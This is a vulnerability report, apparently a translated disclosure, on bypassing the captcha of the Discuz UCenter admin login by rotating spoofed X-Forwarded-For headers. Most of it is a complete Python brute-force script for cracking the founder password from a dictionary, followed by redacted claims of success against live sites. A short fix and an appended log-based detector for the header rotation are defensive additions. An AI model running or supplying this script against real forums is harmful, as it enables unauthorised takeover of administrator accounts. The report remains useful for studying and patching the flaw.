Discuz's UCenter founder password can be cracked (in some cases)
This was found by black-box testing alone, without reading the source code, and it does not rely on recognising the captcha image.
Several successful cases are attached below, together with the code.
http://192.168.1.105/discuz/uc_server/admin.php
The login page contains a captcha (verification code).
The captcha image address is
http://localhost/discuz/uc_server/admin.php?m=seccode&seccodeauth=250dIGq%2FYDhocuXf3IrsBkvB2k23JXlXAbuWr3X1liUcX94&7500
However, testing showed the following:
When you log on to uc_server and the client IP address is being seen for the first time, the seccode defaults to cccc.
The client IP address is taken from the X-Forwarded-For header.
That is, after changing the X-Forwarded-For IP and opening the captcha URL above again, the image shows cccc.
Therefore a program that changes the value of X-Forwarded-For on every request can brute-force the password.
The program is given below (the code is rough, sorry). It takes the Founder's password as an example; the Administrator's password should work the same way.
<poc>
# coding: utf-8
# Python 2 script: httplib/urllib and print statements as in the original
import httplib, re, random, urllib, time
from sys import argv


# Send one login attempt with a random X-Forwarded-For and the default seccode
def getHtml(host, htmlhash, htmlpass, htmlseccode):
    ip = (str(random.randint(1, 100)) + "." + str(random.randint(100, 244)) + "."
          + str(random.randint(100, 244)) + "." + str(random.randint(100, 244)))
    postHead = {
        "Host": host,
        "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0",
        "X-Forwarded-For": ip,
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Connection": "Keep-alive",
    }
    postContent = ('sid=&formhash=' + htmlhash + '&seccodehidden=' + htmlseccode
                   + '&iframe=0&isfounder=1&password=' + htmlpass
                   + '&seccode=cccc&submit=%E7%99%BB+%E5%BD%95')
    conn = httplib.HTTPConnection(host, 80)
    conn.request('POST', '/uc_server/admin.php?m=user&a=login', body=postContent, headers=postHead)
    page = conn.getresponse()
    pageContent = page.read()
    return pageContent


# Get formhash and seccodehidden from the login page
def gethashs(host):
    url = 'http://' + host + '/uc_server/admin.php'
    pageContent = urllib.urlopen(url).read()
    r1 = re.compile('<input type="hidden" name="formhash" value="(\S+)"/>')
    htmlhash = r1.findall(pageContent)[0]
    r2 = re.compile('<input type="hidden" name="seccodehidden" value="(\S+)"/>')
    htmlseccode = r2.findall(pageContent)[0]
    return htmlhash + ' ' + htmlseccode


# Take the host, dictionary file and interval from argv
if len(argv) == 1:
    print '----> python ' + argv[0] + ' <host address> <dictionary file> <interval>'
    print '----> python ' + argv[0] + ' 192.168.1.105 pass.txt 0.2'
else:
    host = argv[1]
    passfile = argv[2]
    sleeptime = argv[3]
    print 'website host is ' + host
    # Take the second-level domain label and derive a few passwords from it
    hostuser = host.split('.')
    hostuser = hostuser[len(hostuser) - 2]
    hostpass = [hostuser + '000000', hostuser + '000000', hostuser + hostuser,
                hostuser + '..', hostuser + '.', hostuser + 'admin888',
                hostuser + 'admin123', hostuser + 'admin', hostuser + '000000']
    print 'the password dictionary is ' + passfile
    print 'the interval is ' + sleeptime
    print '--->'
    x = gethashs(host).split(' ')
    f = open(passfile, 'r')
    htmlpass = f.read().split('\r\n')
    f.close()
    htmlpass = hostpass + htmlpass
    for i in range(len(htmlpass)):
        time.sleep(float(sleeptime))
        print 'attempt password ' + htmlpass[i]
        # An empty response body means the login succeeded
        if getHtml(host, x[0], htmlpass[i], x[1]) == '':
            print 'The password is ' + htmlpass[i]
            break
</poc>
python dz_blast.py 192.168.1.117 pass.txt 0
192.168.1.117 is a fresh Discuz install in a new virtual machine.
Attached successful cases
Not having a dictionary at hand, I just added a few common weak passwords to test.
1. http://**.**.**/  admin123456
2. http://**.**.**/  admin
3. http://**.**.**/  123456
Solution:
Strengthen the captcha check: never fall back to a fixed seccode for an unseen IP, and do not identify the client by the X-Forwarded-For header.
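As an added example (not part of the original report), a small defender-side check in Python: it reads web-server access logs that record the X-Forwarded-For header and flags any TCP peer that POSTs to the UCenter login with many distinct forwarded addresses, which is what the header rotation described above looks like from the server side. The log format, the field names and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (not from the page): combined log format with the
# X-Forwarded-For request header appended as the last quoted field.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2014:10:00:01 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "1.101.102.103"
203.0.113.7 - - [10/Nov/2014:10:00:02 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "44.120.130.140"
203.0.113.7 - - [10/Nov/2014:10:00:03 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "77.200.210.220"
203.0.113.7 - - [10/Nov/2014:10:00:04 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "9.111.122.133"
198.51.100.9 - - [10/Nov/2014:10:05:00 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "-"
198.51.100.9 - - [10/Nov/2014:10:05:30 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "-"
192.0.2.44 - - [10/Nov/2014:10:06:00 +0800] "GET /forum.php HTTP/1.1" 200 9000 "10.0.0.5"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<xff>[^"]*)"$')

# The UCenter admin login endpoint used by the script above
LOGIN_RE = re.compile(r'^/uc_server/admin\.php\?m=user&a=login')


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def xff_rotation(log_text, threshold=3):
    """Map each TCP peer address to the set of X-Forwarded-For values it sent on
    POSTs to the UCenter login, keeping only peers with at least `threshold`
    distinct values. One peer claiming many client addresses is the signature of
    the technique on this page: each forged address counts as a first visit and
    receives the default seccode, so rotating it sidesteps the captcha."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec['method'] != 'POST' or not LOGIN_RE.match(rec['path']):
            continue
        if rec['xff'] and rec['xff'] != '-':   # '-' means the header was absent
            seen[rec['src']].add(rec['xff'])
    return {src: vals for src, vals in seen.items() if len(vals) >= threshold}


if __name__ == '__main__':
    for src, vals in xff_rotation(SAMPLE_LOG).items():
        print('%s sent %d distinct X-Forwarded-For values to the login endpoint' % (src, len(vals)))
```

Peers without the header (the 198.51.100.9 lines) are never flagged, so a legitimate admin behind no proxy produces no alert.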